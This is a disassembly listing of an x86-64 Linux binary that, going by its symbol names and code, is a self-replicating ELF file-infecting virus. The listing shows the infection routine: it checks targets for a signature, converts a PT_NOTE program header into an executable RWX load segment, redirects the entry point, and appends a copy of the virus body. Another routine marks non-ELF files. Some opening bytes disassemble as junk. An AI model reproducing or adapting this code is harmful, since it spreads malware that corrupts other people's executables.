  401ab9:	ba 1a 6b 89 c9       	mov    $0xc9896b1a,%edx
  401abe:	5b                   	pop    %rbx
  401abf:	01 46 1c             	add    %eax,0x1c(%rsi)
  401ac2:	b1 b0                	mov    $0xb0,%cl
  401ac4:	f9                   	stc
  401ac5:	83 56 b6 bd          	adcl   $0xffffffbd,-0x4a(%rsi)
  401ac9:	c5 65 94             	(bad)
  401acc:	cb                   	lret
  401acd:	fd                   	std
  401ace:	45 09 06             	or     %r8d,(%r14)
  401ad1:	a6                   	cmpsb  %es:(%rdi),%ds:(%rsi)
  401ad2:	dc 3a                	fdivrl (%rdx)
  401ad4:	7b c1                	jnp    401a97 <virus_infect_elf.vi_handle_non_elf+0x3>
  401ad6:	f7 ca b9 ba 9a 2c    	test   $0x2c9abab9,%edx
  401adc:	c9                   	leave
  401add:	6e                   	outsb  %ds:(%rsi),(%dx)
  401ade:	8c bc a0 58 6e 34 d0 	mov    %?,-0x2fcb91a8(%rax,%riz,4)
  401ae5:	7b 78                	jnp    401b5f <add_pt_load+0x5>
  401ae7:	53                   	push   %rbx
  401ae8:	e7 d8                	out    %eax,$0xd8
  401aea:	53                   	push   %rbx
  401aeb:	f4                   	hlt
  401aec:	62                   	(bad)
  401aed:	80 31 0f             	xorb   $0xf,(%rcx)
  401af0:	9c                   	pushf
  401af1:	58                   	pop    %rax
  401af2:	5e                   	pop    %rsi
  401af3:	45 ea                	rex.RB (bad)
  401af5:	83 26 6d             	andl   $0x6d,(%rsi)
  401af8:	b1 f8                	mov    $0xf8,%cl
  401afa:	b6 dc                	mov    $0xdc,%dh
  401afc:	4a 01 b6 03 6a 1a 42 	rex.WX add %rsi,0x421a6a03(%rsi)
  401b03:	10 37                	adc    %dh,(%rdi)
  401b05:	be b3 cd c1 92       	mov    $0x92c1cdb3,%esi
  401b0a:	d8 47 8f             	fadds  -0x71(%rdi)
  401b0d:	72 5b                	jb     401b6a <add_pt_load+0x10>
  401b0f:	01 26                	add    %esp,(%rsi)
  401b11:	04 1d                	add    $0x1d,%al
  401b13:	9e                   	sahf

0000000000401b14 <virus_infect_elf.vi_non_elf_append>:
  401b14:	be 81 3a 5b b9       	mov    $0xb95b3a81,%esi
  401b19:	98                   	cwtl
  401b1a:	d6                   	(bad)
  401b1b:	14 00                	adc    $0x0,%al
  401b1d:	06                   	(bad)
  401b1e:	a6                   	cmpsb  %es:(%rdi),%ds:(%rsi)
  401b1f:	53                   	push   %rbx
  401b20:	6a 1a                	push   $0x1a
  401b22:	42                   	rex.X
  401b23:	4a 53                	rex.WX push %rbx
  401b25:	04 32                	add    $0x32,%al
  401b27:	5b                   	pop    %rbx
  401b28:	b9 ba b8 27 f6       	mov    $0xf627b8ba,%ecx
  401b2d:	fb                   	sti
  401b2e:	1f                   	(bad)
  401b2f:	fe                   	(bad)
  401b30:	f4                   	hlt
  401b31:	12 42 32             	adc    0x32(%rdx),%al
  401b34:	ae                   	scas   %es:(%rdi),%al
  401b35:	50                   	push   %rax
  401b36:	3a 5b b9             	cmp    -0x47(%rbx),%bl
  401b39:	c2 b2 34             	ret    $0x34b2
  401b3c:	89                   	.byte 0x89

0000000000401b3d <virus_infect_elf.vi_close_fail>:
  401b3d:	74 6b                	je     401baa <add_pt_load.get_virus_base+0x37>
  401b3f:	43 6a 1a             	rex.XB push $0x1a
  401b42:	60                   	(bad)
  401b43:	7e 04                	jle    401b49 <virus_infect_elf.vi_done+0x2>
  401b45:	b9                   	.byte 0xb9
  401b46:	12                   	.byte 0x12

0000000000401b47 <virus_infect_elf.vi_done>:
  401b47:	81 b3 48 90 81 83 53 	xorl   $0x4c4f3153,-0x7c7e6fb8(%rbx)
  401b4e:	31 4f 4c 
  401b51:	1e                   	(bad)
  401b52:	c2 32 7b             	ret    $0x7b32
  401b55:	83 76 3c 53          	xorl   $0x53,0x3c(%rsi)
  401b59:	a4                   	movsb  %ds:(%rsi),%es:(%rdi)

0000000000401b5a <add_pt_load>:
  401b5a:	55                   	push   %rbp
  401b5b:	48 89 e5             	mov    %rsp,%rbp
  401b5e:	48 83 ec 50          	sub    $0x50,%rsp
  401b62:	41 54                	push   %r12
  401b64:	41 55                	push   %r13
  401b66:	41 56                	push   %r14
  401b68:	41 57                	push   %r15
  401b6a:	53                   	push   %rbx
  401b6b:	49 89 fc             	mov    %rdi,%r12
  401b6e:	e8 00 00 00 00       	call   401b73 <add_pt_load.get_virus_base>

0000000000401b73 <add_pt_load.get_virus_base>:
  401b73:	41 5f                	pop    %r15
  401b75:	49 81 ef ad 07 00 00 	sub    $0x7ad,%r15
  401b7c:	b8 01 01 00 00       	mov    $0x101,%eax
  401b81:	bf 9c ff ff ff       	mov    $0xffffff9c,%edi
  401b86:	4c 89 e6             	mov    %r12,%rsi
  401b89:	ba 02 00 00 00       	mov    $0x2,%edx
  401b8e:	45 31 d2             	xor    %r10d,%r10d
  401b91:	0f 05                	syscall
  401b93:	48 85 c0             	test   %rax,%rax
  401b96:	0f 88 00 03 00 00    	js     401e9c <add_pt_load.add_pt_load_done>
  401b9c:	49 89 c5             	mov    %rax,%r13
  401b9f:	b8 08 00 00 00       	mov    $0x8,%eax
  401ba4:	44 89 ef             	mov    %r13d,%edi
  401ba7:	31 f6                	xor    %esi,%esi
  401ba9:	ba 02 00 00 00       	mov    $0x2,%edx
  401bae:	0f 05                	syscall
  401bb0:	48 85 c0             	test   %rax,%rax
  401bb3:	0f 88 d9 02 00 00    	js     401e92 <add_pt_load.add_pt_load_close_fail>
  401bb9:	48 89 45 f8          	mov    %rax,-0x8(%rbp)
  401bbd:	b8 08 00 00 00       	mov    $0x8,%eax
  401bc2:	44 89 ef             	mov    %r13d,%edi
  401bc5:	31 f6                	xor    %esi,%esi
  401bc7:	31 d2                	xor    %edx,%edx
  401bc9:	0f 05                	syscall
  401bcb:	b8 00 00 00 00       	mov    $0x0,%eax
  401bd0:	44 89 ef             	mov    %r13d,%edi
  401bd3:	48 8d 35 b6 24 10 00 	lea    0x1024b6(%rip),%rsi        # 504090 <elf_header_buf>
  401bda:	ba 40 00 00 00       	mov    $0x40,%edx
  401bdf:	0f 05                	syscall
  401be1:	48 83 f8 40          	cmp    $0x40,%rax
  401be5:	0f 8c a7 02 00 00    	jl     401e92 <add_pt_load.add_pt_load_close_fail>
  401beb:	b8 08 00 00 00       	mov    $0x8,%eax
  401bf0:	44 89 ef             	mov    %r13d,%edi
  401bf3:	31 f6                	xor    %esi,%esi
  401bf5:	31 d2                	xor    %edx,%edx
  401bf7:	0f 05                	syscall
  401bf9:	48 31 db             	xor    %rbx,%rbx
  401bfc:	4c 8b 75 f8          	mov    -0x8(%rbp),%r14

0000000000401c00 <add_pt_load.apt_sig_check_loop>:
  401c00:	b8 00 00 00 00       	mov    $0x0,%eax
  401c05:	44 89 ef             	mov    %r13d,%edi
  401c08:	48 8d 35 c1 32 10 00 	lea    0x1032c1(%rip),%rsi        # 504ed0 <sig_check_buf>
  401c0f:	ba 00 10 00 00       	mov    $0x1000,%edx
  401c14:	0f 05                	syscall
  401c16:	48 85 c0             	test   %rax,%rax
  401c19:	7e 54                	jle    401c6f <add_pt_load.apt_sig_check_done>
  401c1b:	50                   	push   %rax
  401c1c:	48 8d 3d ad 32 10 00 	lea    0x1032ad(%rip),%rdi        # 504ed0 <sig_check_buf>
  401c23:	48 89 c6             	mov    %rax,%rsi
  401c26:	48 8d 15 02 f4 ff ff 	lea    -0xbfe(%rip),%rdx        # 40102f <signature>
  401c2d:	b9 32 00 00 00       	mov    $0x32,%ecx
  401c32:	e8 98 f4 ff ff       	call   4010cf <search_substring>
  401c37:	59                   	pop    %rcx
  401c38:	48 85 c0             	test   %rax,%rax
  401c3b:	0f 85 51 02 00 00    	jne    401e92 <add_pt_load.add_pt_load_close_fail>
  401c41:	48 01 cb             	add    %rcx,%rbx
  401c44:	4c 39 f3             	cmp    %r14,%rbx
  401c47:	7d 26                	jge    401c6f <add_pt_load.apt_sig_check_done>
  401c49:	48 89 de             	mov    %rbx,%rsi
  401c4c:	48 83 ee 32          	sub    $0x32,%rsi
  401c50:	48 83 c6 01          	add    $0x1,%rsi
  401c54:	48 85 f6             	test   %rsi,%rsi
  401c57:	78 16                	js     401c6f <add_pt_load.apt_sig_check_done>
  401c59:	b8 08 00 00 00       	mov    $0x8,%eax
  401c5e:	44 89 ef             	mov    %r13d,%edi
  401c61:	31 d2                	xor    %edx,%edx
  401c63:	0f 05                	syscall
  401c65:	48 85 c0             	test   %rax,%rax
  401c68:	78 05                	js     401c6f <add_pt_load.apt_sig_check_done>
  401c6a:	48 89 c3             	mov    %rax,%rbx
  401c6d:	eb 91                	jmp    401c00 <add_pt_load.apt_sig_check_loop>

0000000000401c6f <add_pt_load.apt_sig_check_done>:
  401c6f:	b8 08 00 00 00       	mov    $0x8,%eax
  401c74:	44 89 ef             	mov    %r13d,%edi
  401c77:	31 f6                	xor    %esi,%esi
  401c79:	31 d2                	xor    %edx,%edx
  401c7b:	0f 05                	syscall
  401c7d:	b8 00 00 00 00       	mov    $0x0,%eax
  401c82:	44 89 ef             	mov    %r13d,%edi
  401c85:	48 8d 35 04 24 10 00 	lea    0x102404(%rip),%rsi        # 504090 <elf_header_buf>
  401c8c:	ba 40 00 00 00       	mov    $0x40,%edx
  401c91:	0f 05                	syscall
  401c93:	48 8d 3d f6 23 10 00 	lea    0x1023f6(%rip),%rdi        # 504090 <elf_header_buf>
  401c9a:	48 8b 47 18          	mov    0x18(%rdi),%rax
  401c9e:	48 89 45 e8          	mov    %rax,-0x18(%rbp)
  401ca2:	4c 8b 77 20          	mov    0x20(%rdi),%r14
  401ca6:	0f b7 5f 38          	movzwl 0x38(%rdi),%ebx
  401caa:	0f b7 47 36          	movzwl 0x36(%rdi),%eax
  401cae:	48 89 45 d8          	mov    %rax,-0x28(%rbp)
  401cb2:	b8 08 00 00 00       	mov    $0x8,%eax
  401cb7:	44 89 ef             	mov    %r13d,%edi
  401cba:	4c 89 f6             	mov    %r14,%rsi
  401cbd:	31 d2                	xor    %edx,%edx
  401cbf:	0f 05                	syscall
  401cc1:	48 89 d8             	mov    %rbx,%rax
  401cc4:	48 0f af 45 d8       	imul   -0x28(%rbp),%rax
  401cc9:	48 89 c2             	mov    %rax,%rdx
  401ccc:	b8 00 00 00 00       	mov    $0x0,%eax
  401cd1:	44 89 ef             	mov    %r13d,%edi
  401cd4:	48 8d 35 f5 23 10 00 	lea    0x1023f5(%rip),%rsi        # 5040d0 <elf_phdr_buf>
  401cdb:	0f 05                	syscall
  401cdd:	48 8d 3d ec 23 10 00 	lea    0x1023ec(%rip),%rdi        # 5040d0 <elf_phdr_buf>
  401ce4:	48 31 c9             	xor    %rcx,%rcx

0000000000401ce7 <add_pt_load.find_note_loop>:
  401ce7:	48 39 d9             	cmp    %rbx,%rcx
  401cea:	0f 8d a2 01 00 00    	jge    401e92 <add_pt_load.add_pt_load_close_fail>
  401cf0:	48 89 c8             	mov    %rcx,%rax
  401cf3:	48 0f af 45 d8       	imul   -0x28(%rbp),%rax
  401cf8:	48 8d 34 07          	lea    (%rdi,%rax,1),%rsi
  401cfc:	83 3e 04             	cmpl   $0x4,(%rsi)
  401cff:	74 05                	je     401d06 <add_pt_load.found_note_main>
  401d01:	48 ff c1             	inc    %rcx
  401d04:	eb e1                	jmp    401ce7 <add_pt_load.find_note_loop>

0000000000401d06 <add_pt_load.found_note_main>:
  401d06:	56                   	push   %rsi
  401d07:	48 8d 3d c2 23 10 00 	lea    0x1023c2(%rip),%rdi        # 5040d0 <elf_phdr_buf>
  401d0e:	48 31 c9             	xor    %rcx,%rcx
  401d11:	4d 31 c0             	xor    %r8,%r8

0000000000401d14 <add_pt_load.find_max_vaddr_main>:
  401d14:	48 39 d9             	cmp    %rbx,%rcx
  401d17:	7d 26                	jge    401d3f <add_pt_load.found_max_vaddr_main>
  401d19:	48 89 c8             	mov    %rcx,%rax
  401d1c:	48 0f af 45 d8       	imul   -0x28(%rbp),%rax
  401d21:	48 8d 34 07          	lea    (%rdi,%rax,1),%rsi
  401d25:	83 3e 01             	cmpl   $0x1,(%rsi)
  401d28:	75 10                	jne    401d3a <add_pt_load.next_phdr_main>
  401d2a:	4c 8b 4e 10          	mov    0x10(%rsi),%r9
  401d2e:	4c 03 4e 28          	add    0x28(%rsi),%r9
  401d32:	4d 39 c1             	cmp    %r8,%r9
  401d35:	7e 03                	jle    401d3a <add_pt_load.next_phdr_main>
  401d37:	4d 89 c8             	mov    %r9,%r8

0000000000401d3a <add_pt_load.next_phdr_main>:
  401d3a:	48 ff c1             	inc    %rcx
  401d3d:	eb d5                	jmp    401d14 <add_pt_load.find_max_vaddr_main>

0000000000401d3f <add_pt_load.found_max_vaddr_main>:
  401d3f:	48 8b 45 f8          	mov    -0x8(%rbp),%rax
  401d43:	48 25 ff 0f 00 00    	and    $0xfff,%rax
  401d49:	49 81 c0 ff 0f 00 00 	add    $0xfff,%r8
  401d50:	49 81 e0 00 f0 ff ff 	and    $0xfffffffffffff000,%r8
  401d57:	49 01 c0             	add    %rax,%r8
  401d5a:	5e                   	pop    %rsi
  401d5b:	c7 06 01 00 00 00    	movl   $0x1,(%rsi)
  401d61:	c7 46 04 07 00 00 00 	movl   $0x7,0x4(%rsi)
  401d68:	48 8b 45 f8          	mov    -0x8(%rbp),%rax
  401d6c:	48 89 46 08          	mov    %rax,0x8(%rsi)
  401d70:	4c 89 46 10          	mov    %r8,0x10(%rsi)
  401d74:	4c 89 46 18          	mov    %r8,0x18(%rsi)
  401d78:	4c 89 45 e0          	mov    %r8,-0x20(%rbp)
  401d7c:	b8 94 07 00 00       	mov    $0x794,%eax
  401d81:	48 89 46 20          	mov    %rax,0x20(%rsi)
  401d85:	48 89 46 28          	mov    %rax,0x28(%rsi)
  401d89:	48 c7 46 30 00 10 00 	movq   $0x1000,0x30(%rsi)
  401d90:	00 
  401d91:	b8 08 00 00 00       	mov    $0x8,%eax
  401d96:	44 89 ef             	mov    %r13d,%edi
  401d99:	4c 89 f6             	mov    %r14,%rsi
  401d9c:	31 d2                	xor    %edx,%edx
  401d9e:	0f 05                	syscall
  401da0:	48 89 d8             	mov    %rbx,%rax
  401da3:	48 0f af 45 d8       	imul   -0x28(%rbp),%rax
  401da8:	48 89 c2             	mov    %rax,%rdx
  401dab:	b8 01 00 00 00       	mov    $0x1,%eax
  401db0:	44 89 ef             	mov    %r13d,%edi
  401db3:	48 8d 35 16 23 10 00 	lea    0x102316(%rip),%rsi        # 5040d0 <elf_phdr_buf>
  401dba:	0f 05                	syscall
  401dbc:	48 8b 45 e0          	mov    -0x20(%rbp),%rax
  401dc0:	48 83 c0 19          	add    $0x19,%rax
  401dc4:	48 8d 3d c5 22 10 00 	lea    0x1022c5(%rip),%rdi        # 504090 <elf_header_buf>
  401dcb:	48 89 47 18          	mov    %rax,0x18(%rdi)
  401dcf:	b8 08 00 00 00       	mov    $0x8,%eax
  401dd4:	44 89 ef             	mov    %r13d,%edi
  401dd7:	31 f6                	xor    %esi,%esi
  401dd9:	31 d2                	xor    %edx,%edx
  401ddb:	0f 05                	syscall
  401ddd:	b8 01 00 00 00       	mov    $0x1,%eax
  401de2:	44 89 ef             	mov    %r13d,%edi
  401de5:	48 8d 35 a4 22 10 00 	lea    0x1022a4(%rip),%rsi        # 504090 <elf_header_buf>
  401dec:	ba 40 00 00 00       	mov    $0x40,%edx
  401df1:	0f 05                	syscall
  401df3:	48 8d 35 cc f5 ff ff 	lea    -0xa34(%rip),%rsi        # 4013c6 <original_entry_storage>
  401dfa:	48 8d 3d cf 40 10 00 	lea    0x1040cf(%rip),%rdi        # 505ed0 <virus_copy_buf>
  401e01:	b9 94 07 00 00       	mov    $0x794,%ecx

0000000000401e06 <add_pt_load.copy_virus_main>:
  401e06:	48 85 c9             	test   %rcx,%rcx
  401e09:	74 0f                	je     401e1a <add_pt_load.copy_done_main>
  401e0b:	8a 06                	mov    (%rsi),%al
  401e0d:	88 07                	mov    %al,(%rdi)
  401e0f:	48 ff c6             	inc    %rsi
  401e12:	48 ff c7             	inc    %rdi
  401e15:	48 ff c9             	dec    %rcx
  401e18:	eb ec                	jmp    401e06 <add_pt_load.copy_virus_main>

0000000000401e1a <add_pt_load.copy_done_main>:
  401e1a:	48 8d 3d af 40 10 00 	lea    0x1040af(%rip),%rdi        # 505ed0 <virus_copy_buf>
  401e21:	48 8b 45 e8          	mov    -0x18(%rbp),%rax
  401e25:	48 8b 4d e0          	mov    -0x20(%rbp),%rcx
  401e29:	48 83 c1 19          	add    $0x19,%rcx
  401e2d:	48 29 c8             	sub    %rcx,%rax
  401e30:	48 89 07             	mov    %rax,(%rdi)
  401e33:	b8 08 00 00 00       	mov    $0x8,%eax
  401e38:	44 89 ef             	mov    %r13d,%edi
  401e3b:	31 f6                	xor    %esi,%esi
  401e3d:	ba 02 00 00 00       	mov    $0x2,%edx
  401e42:	0f 05                	syscall
  401e44:	b8 01 00 00 00       	mov    $0x1,%eax
  401e49:	44 89 ef             	mov    %r13d,%edi
  401e4c:	48 8d 35 7d 40 10 00 	lea    0x10407d(%rip),%rsi        # 505ed0 <virus_copy_buf>
  401e53:	ba 94 07 00 00       	mov    $0x794,%edx
  401e58:	0f 05                	syscall
  401e5a:	b8 03 00 00 00       	mov    $0x3,%eax
  401e5f:	44 89 ef             	mov    %r13d,%edi
  401e62:	0f 05                	syscall
  401e64:	48 8d 3d e3 11 00 00 	lea    0x11e3(%rip),%rdi        # 40304e <msg_infected>
  401e6b:	e8 25 f2 ff ff       	call   401095 <print_string>
  401e70:	4c 89 e7             	mov    %r12,%rdi
  401e73:	e8 1d f2 ff ff       	call   401095 <print_string>
  401e78:	b8 01 00 00 00       	mov    $0x1,%eax
  401e7d:	bf 01 00 00 00       	mov    $0x1,%edi
  401e82:	48 8d 35 77 11 00 00 	lea    0x1177(%rip),%rsi        # 403000 <newline>
  401e89:	ba 01 00 00 00       	mov    $0x1,%edx
  401e8e:	0f 05                	syscall
  401e90:	eb 0a                	jmp    401e9c <add_pt_load.add_pt_load_done>

0000000000401e92 <add_pt_load.add_pt_load_close_fail>:
  401e92:	b8 03 00 00 00       	mov    $0x3,%eax
  401e97:	44 89 ef             	mov    %r13d,%edi
  401e9a:	0f 05                	syscall

0000000000401e9c <add_pt_load.add_pt_load_done>:
  401e9c:	5b                   	pop    %rbx
  401e9d:	41 5f                	pop    %r15
  401e9f:	41 5e                	pop    %r14
  401ea1:	41 5d                	pop    %r13
  401ea3:	41 5c                	pop    %r12
  401ea5:	48 83 c4 50          	add    $0x50,%rsp
  401ea9:	48 89 ec             	mov    %rbp,%rsp
  401eac:	5d                   	pop    %rbp
  401ead:	c3                   	ret

0000000000401eae <process_non_elf_file>:
  401eae:	55                   	push   %rbp
  401eaf:	48 89 e5             	mov    %rsp,%rbp
  401eb2:	41 54                	push   %r12
  401eb4:	41 55                	push   %r13
  401eb6:	41 56                	push   %r14
  401eb8:	41 57                	push   %r15
  401eba:	53                   	push   %rbx
  401ebb:	49 89 fc             	mov    %rdi,%r12
  401ebe:	b8 01 01 00 00       	mov    $0x101,%eax
  401ec3:	bf 9c ff ff ff       	mov    $0xffffff9c,%edi
  401ec8:	4c 89 e6             	mov    %r12,%rsi
  401ecb:	31 d2                	xor    %edx,%edx
  401ecd:	45 31 d2             	xor    %r10d,%r10d
  401ed0:	0f 05                	syscall
  401ed2:	48 85 c0             	test   %rax,%rax
  401ed5:	0f 88 3e 01 00 00    	js     402019 <process_non_elf_file.process_done>
  401edb:	49 89 c5             	mov    %rax,%r13
  401ede:	b8 08 00 00 00       	mov    $0x8,%eax
  401ee3:	44 89 ef             	mov    %r13d,%edi
  401ee6:	31 f6                	xor    %esi,%esi
  401ee8:	ba 02 00 00 00       	mov    $0x2,%edx
  401eed:	0f 05                	syscall
  401eef:	48 85 c0             	test   %rax,%rax
  401ef2:	0f 8e 9b 00 00 00    	jle    401f93 <process_non_elf_file.process_close_and_append>
  401ef8:	49 89 c6             	mov    %rax,%r14
  401efb:	b8 08 00 00 00       	mov    $0x8,%eax
  401f00:	44 89 ef             	mov    %r13d,%edi
  401f03:	31 f6                	xor    %esi,%esi
  401f05:	31 d2                	xor    %edx,%edx
  401f07:	0f 05                	syscall
  401f09:	4d 31 ff             	xor    %r15,%r15

0000000000401f0c <process_non_elf_file.process_sig_read_loop>:
  401f0c:	b8 00 00 00 00       	mov    $0x0,%eax
  401f11:	44 89 ef             	mov    %r13d,%edi
  401f14:	48 8d 35 b5 2f 10 00 	lea    0x102fb5(%rip),%rsi        # 504ed0 <sig_check_buf>
  401f1b:	ba 00 10 00 00       	mov    $0x1000,%edx
  401f20:	0f 05                	syscall
  401f22:	48 85 c0             	test   %rax,%rax
  401f25:	7e 6c                	jle    401f93 <process_non_elf_file.process_close_and_append>
  401f27:	48 89 c3             	mov    %rax,%rbx
  401f2a:	48 8d 3d 9f 2f 10 00 	lea    0x102f9f(%rip),%rdi        # 504ed0 <sig_check_buf>
  401f31:	48 89 de             	mov    %rbx,%rsi
  401f34:	48 8d 15 f4 f0 ff ff 	lea    -0xf0c(%rip),%rdx        # 40102f <signature>
  401f3b:	b9 32 00 00 00       	mov    $0x32,%ecx
  401f40:	e8 8a f1 ff ff       	call   4010cf <search_substring>
  401f45:	48 85 c0             	test   %rax,%rax
  401f48:	75 2e                	jne    401f78 <process_non_elf_file.process_already_infected>
  401f4a:	49 01 df             	add    %rbx,%r15
  401f4d:	4d 39 f7             	cmp    %r14,%r15
  401f50:	7d 41                	jge    401f93 <process_non_elf_file.process_close_and_append>
  401f52:	4c 89 fe             	mov    %r15,%rsi
  401f55:	48 83 ee 32          	sub    $0x32,%rsi
  401f59:	48 83 c6 01          	add    $0x1,%rsi
  401f5d:	48 85 f6             	test   %rsi,%rsi
  401f60:	78 31                	js     401f93 <process_non_elf_file.process_close_and_append>
  401f62:	b8 08 00 00 00       	mov    $0x8,%eax
  401f67:	44 89 ef             	mov    %r13d,%edi
  401f6a:	31 d2                	xor    %edx,%edx
  401f6c:	0f 05                	syscall
  401f6e:	48 85 c0             	test   %rax,%rax
  401f71:	78 20                	js     401f93 <process_non_elf_file.process_close_and_append>
  401f73:	49 89 c7             	mov    %rax,%r15
  401f76:	eb 94                	jmp    401f0c <process_non_elf_file.process_sig_read_loop>

0000000000401f78 <process_non_elf_file.process_already_infected>:
  401f78:	b8 03 00 00 00       	mov    $0x3,%eax
  401f7d:	44 89 ef             	mov    %r13d,%edi
  401f80:	0f 05                	syscall
  401f82:	48 8d 3d cf 10 00 00 	lea    0x10cf(%rip),%rdi        # 403058 <msg_already_infected>
  401f89:	e8 07 f1 ff ff       	call   401095 <print_string>
  401f8e:	e9 86 00 00 00       	jmp    402019 <process_non_elf_file.process_done>

0000000000401f93 <process_non_elf_file.process_close_and_append>:
  401f93:	b8 03 00 00 00       	mov    $0x3,%eax
  401f98:	44 89 ef             	mov    %r13d,%edi
  401f9b:	0f 05                	syscall
  401f9d:	b8 01 01 00 00       	mov    $0x101,%eax
  401fa2:	bf 9c ff ff ff       	mov    $0xffffff9c,%edi
  401fa7:	4c 89 e6             	mov    %r12,%rsi
  401faa:	ba 01 04 00 00       	mov    $0x401,%edx
  401faf:	45 31 d2             	xor    %r10d,%r10d
  401fb2:	0f 05                	syscall
  401fb4:	48 85 c0             	test   %rax,%rax
  401fb7:	78 60                	js     402019 <process_non_elf_file.process_done>
  401fb9:	49 89 c5             	mov    %rax,%r13
  401fbc:	b8 01 00 00 00       	mov    $0x1,%eax
  401fc1:	44 89 ef             	mov    %r13d,%edi
  401fc4:	48 8d 35 64 f0 ff ff 	lea    -0xf9c(%rip),%rsi        # 40102f <signature>
  401fcb:	ba 32 00 00 00       	mov    $0x32,%edx
  401fd0:	0f 05                	syscall
  401fd2:	48 85 c0             	test   %rax,%rax
  401fd5:	78 38                	js     40200f <process_non_elf_file.process_write_failed>
  401fd7:	b8 03 00 00 00       	mov    $0x3,%eax
  401fdc:	44 89 ef             	mov    %r13d,%edi
  401fdf:	0f 05                	syscall
  401fe1:	48 8d 3d 66 10 00 00 	lea    0x1066(%rip),%rdi        # 40304e <msg_infected>
  401fe8:	e8 a8 f0 ff ff       	call   401095 <print_string>
  401fed:	4c 89 e7             	mov    %r12,%rdi
  401ff0:	e8 a0 f0 ff ff       	call   401095 <print_string>
  401ff5:	b8 01 00 00 00       	mov    $0x1,%eax
  401ffa:	bf 01 00 00 00       	mov    $0x1,%edi
  401fff:	48 8d 35 fa 0f 00 00 	lea    0xffa(%rip),%rsi        # 403000 <newline>
  402006:	ba 01 00 00 00       	mov    $0x1,%edx
  40200b:	0f 05                	syscall
  40200d:	eb 0a                	jmp    402019 <process_non_elf_file.process_done>

000000000040200f <process_non_elf_file.process_write_failed>:
  40200f:	b8 03 00 00 00       	mov    $0x3,%eax
  402014:	44 89 ef             	mov    %r13d,%edi
  402017:	0f 05                	syscall

0000000000402019 <process_non_elf_file.process_done>:
  402019:	5b                   	pop    %rbx
  40201a:	41 5f                	pop    %r15
  40201c:	41 5e                	pop    %r14
  40201e:	41 5d                	pop    %r13
  402020:	41 5c                	pop    %r12
  402022:	48 89 ec             	mov    %rbp,%rsp
  402025:	5d                   	pop    %rbp
  402026:	c3                   	ret

0000000000402027 <_end>:
  402027:	b8 3c 00 00 00       	mov    $0x3c,%eax
  40202c:	31 ff                	xor    %edi,%edi
  40202e:	0f 05                	syscall
